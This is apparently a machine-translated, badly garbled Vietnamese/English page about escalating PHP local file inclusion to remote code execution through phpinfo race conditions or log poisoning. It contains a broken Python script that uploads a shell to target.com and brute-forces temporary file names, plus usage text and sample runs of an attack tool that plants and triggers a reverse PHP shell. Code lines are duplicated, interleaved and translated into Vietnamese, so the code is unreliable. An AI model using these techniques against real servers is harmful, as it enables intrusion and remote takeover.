Hướng dẫn lfi to rce phpinfo - lfi đến rce phpinfo

Nhập itertools itertools

Nhập yêu cầu requests

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in ('[+] cố gắng giành chiến thắng trong cuộc đua')('[+] Trying to win the race')

f = {'file': open ('shell.php', 'rb')}={'file': open('shell.php', 'rb')}

cho _ Inrange (4096*4096): _ in range(4096 *4096):

Yêu cầu.post ('http://target.com/index.php?c=index.php', f).post('http://target.com/index.php?c=index.php', f)

in ('[+] cố gắng giành chiến thắng trong cuộc đua')('[+] Bruteforcing the inclusion')

f = {'file': open ('shell.php', 'rb')} fname in itertools.combinations(string.ascii_letters + string.digits, 6):

cho _ Inrange (4096*4096):='http://target.com/index.php?c=/tmp/php' + fname

Yêu cầu.post ('http://target.com/index.php?c=index.php', f)= requests.get(url)

in ('[+] vũ phu bao gồm')'load average' in r.text: #

cho fname trong itertools.combinations (String.ascii_letters + String.digits, 6):('[+] We have got a shell: ' + url)

url = 'http: //target.com/index.php? C =/tmp/php'+ fname.exit(0)

in ('[+] cố gắng giành chiến thắng trong cuộc đua')('[x] Something went wrong, please try again')

f = {'file': open ('shell.php', 'rb')}

cho _ Inrange (4096*4096):

Yêu cầu.post ('http://target.com/index.php?c=index.php', f)

in ('[+] vũ phu bao gồm')

cho fname trong itertools.combinations (String.ascii_letters + String.digits, 6):

  • url = 'http: //target.com/index.php? C =/tmp/php'+ fname
  • r = requests.get (url)

if'load trung bình'in r.text:#

  • url = 'http: //target.com/index.php? C =/tmp/php'+ fname
  • r = requests.get (url)

if'load trung bình'in r.text:#

usage: lfito_rce.py [-h] [-a ACTION] -l LFI --lhost LHOST --lport LPORT
                         [--payload PTYPE] [-e REQEND] [-v VERBOSE]
                         [-t THREADS] [-i PHPINFO] [-f LOGFILE]

RCE from LFI with PHPINFO assistance or Via controlled log file

optional arguments:
  -h, --help            show this help message and exit
  -a ACTION, --action ACTION
                        Define the attack type - 1 for PHPINFO and - 2 for
                        controlled log. Value 1 by default
  -l LFI, --lfi LFI     the url path of the LFI vuln, per example
  --lhost LHOST         The local ip to listen, for rev shell
  --lport LPORT         The local port to listen, for rev shell
  --payload PTYPE       Set the type of payload to use. 1|2|3 By default
                        payload is set to 3
  -e REQEND, --end REQEND
                        Define any end of lfi request, per examlpe "%00" by
                        default the end request is empty
  -v VERBOSE, --verbose VERBOSE
                        Define verbose output. set to False by default
  -t THREADS, --threads THREADS
                        [For phpinfo action]. Threads number, set to 10 by
  -i PHPINFO, --phpinfo PHPINFO
                        [For phpinfo action]. Define the url path of the
                        "phpinfo" script. Per ex: "http://host/phpinfo.php"
  -f LOGFILE, --logfile LOGFILE
                        [For controlled log action]. Define the path of the
                        http server log file. By default script will use

cho fname trong itertools.combinations (String.ascii_letters + String.digits, 6):

$ python lfito_rce.py -l "http://host/browse.php?file=" --lhost --lport 9001  -t 12  -i "http://host:8080/phpinfo.php"

 ____   ____   ____   ____ _     _       _              _ 
|  _ \ / __ \ / /\ \ / ___| |__ / |____ | |_ ___   ___ | |
| |_) / / _` | |  | | |  _| '_ \| |_  / | __/ _ \ / _ \| |
|  _ < | (_| | |  | | |_| | | | | |/ /  | || (_) | (_) | |
|_| \_\ \__,_| |  | |\____|_| |_|_/___|  \__\___/ \___/|_|
       \____/ \_\/_/                                      

Find all scripts in: https://github.com/roughiz

LFI With PHPInfo() RCE script

Spawning worker pool (12)...
  24 /  1000
Got it! Reverse php Shell created in /tmp/IVA1XpPtHGjS.php

Yep! The payload works great !

I will execute the reverse shell, requesting the url: http://host/browse.php?file=/tmp/IVA1XpPtHGjS.php

Verify your nc listenner
Shuttin' down...

if'load trung bình'in r.text:#

$ python lfito_rce.py -a 2 -l "http://host/browse.php?file=" --lhost --lport 9001

 ____   ____   ____   ____ _     _       _              _ 
|  _ \ / __ \ / /\ \ / ___| |__ / |____ | |_ ___   ___ | |
| |_) / / _` | |  | | |  _| '_ \| |_  / | __/ _ \ / _ \| |
|  _ < | (_| | |  | | |_| | | | | |/ /  | || (_) | (_) | |
|_| \_\ \__,_| |  | |\____|_| |_|_/___|  \__\___/ \___/|_|
       \____/ \_\/_/                                      

Find all scripts in: https://github.com/roughiz

LFI RCE via controlled log

  16 /   26
Got it! Reverse php Shell created in /tmp/k0THSi7vdS58.php

I will execute the reverse shell, requesting the url: http://host/browse.php?file=/tmp/k0THSi7vdS58.php

Verify your nc listenner

sys.exit (0)

in ('[x] có gì đó không ổn, vui lòng thử lại')

$ sudo pip install pyfiglet